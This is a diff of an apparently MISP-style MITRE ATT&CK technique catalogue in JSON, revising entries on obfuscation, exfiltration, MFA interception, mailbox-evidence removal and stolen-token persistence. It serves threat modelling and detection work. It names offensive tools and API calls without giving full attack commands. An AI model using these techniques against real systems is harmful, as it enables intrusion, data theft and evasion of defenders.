- "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",
+ "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",
"meta": {
"external_id": "T1140",
"kill_chain": [
@@ -4712,7 +4735,7 @@
"value": "Data Transfer Size Limits - T1030"
},
{
- "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+ "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
"meta": {
"external_id": "T1005",
"kill_chain": [
@@ -4733,6 +4756,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1005",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733",
"https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
@@ -4815,7 +4839,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1016",
- "https://capec.mitre.org/data/definitions/309.html",
"https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
@@ -4996,7 +5019,7 @@
"value": "Data from Configuration Repository - T1602"
},
{
- "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
+ "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
"meta": {
"external_id": "T1027",
"kill_chain": [
@@ -5008,7 +5031,10 @@
"File: File Metadata",
"Module: Module Load",
"Process: OS API Execution",
- "Process: Process Creation"
+ "Process: Process Creation",
+ "Script: Script Execution",
+ "WMI: WMI Creation",
+ "Windows Registry: Windows Registry Key Creation"
],
"mitre_platforms": [
"Linux",
@@ -5017,12 +5043,11 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027",
- "https://capec.mitre.org/data/definitions/267.html",
"https://github.com/danielbohannon/Revoke-Obfuscation",
"https://github.com/itsreallynick/office-crackros",
"https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
+ "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
"https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/",
- "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf",
"https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/",
"https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
@@ -5177,8 +5202,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1083",
"https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html",
- "https://capec.mitre.org/data/definitions/127.html",
- "https://capec.mitre.org/data/definitions/497.html",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
},
@@ -5340,13 +5363,15 @@
"value": "Obtain Device Cloud Backups - T1470"
},
{
- "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ",
+ "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).",
"meta": {
"external_id": "T1048",
"kill_chain": [
"mitre-attack:exfiltration"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
+ "Cloud Storage: Cloud Storage Access",
"Command: Command Execution",
"File: File Access",
"Network Traffic: Network Connection Creation",
@@ -5356,7 +5381,12 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Office 365",
+ "SaaS",
+ "IaaS",
+ "Google Workspace",
+ "Network"
],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
@@ -5481,7 +5511,11 @@
"Linux",
"macOS",
"Windows",
- "Network"
+ "Network",
+ "Office 365",
+ "Azure AD",
+ "IaaS",
+ "Google Workspace"
],
"refs": [
"https://attack.mitre.org/techniques/T1059",
@@ -5805,7 +5839,7 @@
"value": "Kernel Modules and Extensions - T1215"
},
{
- "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
+ "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
"meta": {
"external_id": "T1612",
"kill_chain": [
@@ -7068,10 +7102,6 @@
"refs": [
"https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/",
"https://attack.mitre.org/techniques/T1499",
- "https://capec.mitre.org/data/definitions/125.html",
- "https://capec.mitre.org/data/definitions/130.html",
- "https://capec.mitre.org/data/definitions/131.html",
- "https://capec.mitre.org/data/definitions/227.html",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html",
"https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf",
@@ -7333,7 +7363,7 @@
"value": "Dynamic-link Library Injection - T1055.001"
},
{
- "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
+ "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
"meta": {
"external_id": "T1190",
"kill_chain": [
@@ -7359,7 +7389,9 @@
"https://nvd.nist.gov/vuln/detail/CVE-2016-6662",
"https://us-cert.cisa.gov/ncas/alerts/TA18-106A",
"https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/",
- "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
+ "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem",
+ "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"
]
},
"uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
@@ -7380,7 +7412,7 @@
"value": "Untargeted client-side exploitation - T1370"
},
{
- "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
+ "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
"meta": {
"external_id": "T1095",
"kill_chain": [
@@ -7409,7 +7441,7 @@
"value": "Non-Application Layer Protocol - T1095"
},
{
- "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+ "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)",
"meta": {
"external_id": "T1111",
"kill_chain": [
@@ -7426,10 +7458,10 @@
"macOS"
],
"refs": [
- "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf",
"https://attack.mitre.org/techniques/T1111",
"https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf",
- "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/"
+ "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/",
+ "https://sec.okta.com/scatterswine"
]
},
"uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49",
@@ -7581,7 +7613,6 @@
"refs": [
"http://support.microsoft.com/kb/314984",
"https://attack.mitre.org/techniques/T1021/002",
- "https://capec.mitre.org/data/definitions/561.html",
"https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem",
"https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts",
"https://en.wikipedia.org/wiki/Server_Message_Block",
@@ -7777,13 +7808,14 @@
"value": "Clear Command History - T1070.003"
},
{
- "description": "Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)",
+ "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)",
"meta": {
"external_id": "T1070.008",
"kill_chain": [
"mitre-attack:defense-evasion"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
"Command: Command Execution",
"File: File Deletion",
"File: File Modification",
@@ -7801,6 +7833,7 @@
"https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
"https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes",
"https://man7.org/linux/man-pages/man1/mailx.1p.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",
"https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
]
},
@@ -7894,7 +7927,6 @@
"refs": [
"http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/",
"https://attack.mitre.org/techniques/T1021/001",
- "https://capec.mitre.org/data/definitions/555.html",
"https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"
]
},
@@ -8176,7 +8208,7 @@
"value": "Local Data Staging - T1074.001"
},
{
- "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nIn AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
+ "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
"meta": {
"external_id": "T1550.001",
"kill_chain": [
@@ -8197,7 +8229,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1550/001",
"https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/",
- "https://capec.mitre.org/data/definitions/593.html",
"https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials",
"https://cloud.google.com/iam/docs/service-account-monitoring",
"https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen",
@@ -8205,7 +8236,8 @@
"https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html",
"https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens",
"https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration",
- "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"
+ "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/",
+ "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/"
]
},
"related": [
@@ -8250,7 +8282,7 @@
"value": "SQL Stored Procedures - T1505.001"
},
{
- "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options.\n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)",
